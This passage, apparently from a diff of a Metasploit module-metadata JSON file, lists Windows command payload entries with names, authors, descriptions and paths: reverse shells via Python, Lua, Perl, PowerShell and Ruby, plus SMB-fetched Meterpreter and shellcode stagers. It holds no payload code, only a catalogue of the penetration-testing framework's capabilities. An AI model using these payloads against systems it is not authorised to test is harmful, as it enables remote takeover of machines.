"payload/cmd/windows/python/shell_reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "RageLtMan " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/shell_reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/shell_reverse_udp", - "staged": false - }, - "payload_cmd/windows/reverse_lua": { - "name": "Windows Command Shell, Reverse TCP (via Lua)", - "fullname": "payload/cmd/windows/reverse_lua", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "xistence " - ], - "description": "Creates an interactive shell via Lua", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/reverse_lua.rb", - "is_install_path": true, - "ref_name": "cmd/windows/reverse_lua", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/reverse_perl": { - "name": "Windows Command, Double Reverse TCP Connection (via Perl)", - "fullname": "payload/cmd/windows/reverse_perl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "cazz ", - "aushack " - ], - "description": "Creates an interactive shell via perl", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/reverse_perl.rb", - "is_install_path": true, - "ref_name": "cmd/windows/reverse_perl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/reverse_powershell": { - "name": "Windows Command Shell, Reverse TCP (via Powershell)", - "fullname": "payload/cmd/windows/reverse_powershell", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Dave Kennedy", - "Ben Campbell " - ], - "description": "Connect back and create a command shell via Powershell", - "references": [ - "URL-https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/powershell/reverse.powershell" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/reverse_powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/reverse_powershell", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/reverse_ruby": { - "name": "Windows Command Shell, Reverse TCP (via Ruby)", - "fullname": "payload/cmd/windows/reverse_ruby", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Connect back and create a command shell via Ruby", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/reverse_ruby.rb", - "is_install_path": true, - "ref_name": "cmd/windows/reverse_ruby", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/smb/x64/custom/bind_ipv6_tcp": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/custom/bind_named_pipe": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/smb/x64/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/smb/x64/custom/bind_tcp": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/smb/x64/custom/bind_tcp_rc4": { - "name": "SMB Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/custom/bind_tcp_uuid": { - "name": "SMB Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/custom/reverse_http": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_http", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/smb/x64/custom/reverse_https": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_https", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/smb/x64/custom/reverse_named_pipe": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/smb/x64/custom/reverse_tcp": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/smb/x64/custom/reverse_tcp_rc4": { - "name": "SMB Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/custom/reverse_tcp_uuid": { - "name": "SMB Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/custom/reverse_winhttp": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/smb/x64/custom/reverse_winhttps": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/smb/x64/encrypted_shell/reverse_tcp": { - "name": "SMB Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/encrypted_shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/encrypted_shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/encrypted_shell", - "stager_refname": "windows/x64/encrypted_reverse_tcp" - }, - "payload_cmd/windows/smb/x64/encrypted_shell_reverse_tcp": { - "name": "SMB Fetch, Windows Encrypted Reverse Shell", - "fullname": "payload/cmd/windows/smb/x64/encrypted_shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn an encrypted command shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/encrypted_shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/exec": { - "name": "SMB Fetch, Windows x64 Execute Command", - "fullname": "payload/cmd/windows/smb/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nExecute an arbitrary command (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/exec", - "staged": false - }, - "payload_cmd/windows/smb/x64/loadlibrary": { - "name": "SMB Fetch, Windows x64 LoadLibrary Path", - "fullname": "payload/cmd/windows/smb/x64/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "scriptjunkie", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nLoad an arbitrary x64 library path", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/loadlibrary", - "staged": false - }, - "payload_cmd/windows/smb/x64/messagebox": { - "name": "SMB Fetch, Windows MessageBox x64", - "fullname": "payload/cmd/windows/smb/x64/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "pasta " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/messagebox", - "staged": false - }, - "payload_cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp": { - "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid": { - "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/meterpreter/bind_named_pipe": { - "name": "SMB Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/smb/x64/meterpreter/bind_tcp": { - "name": "SMB Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - 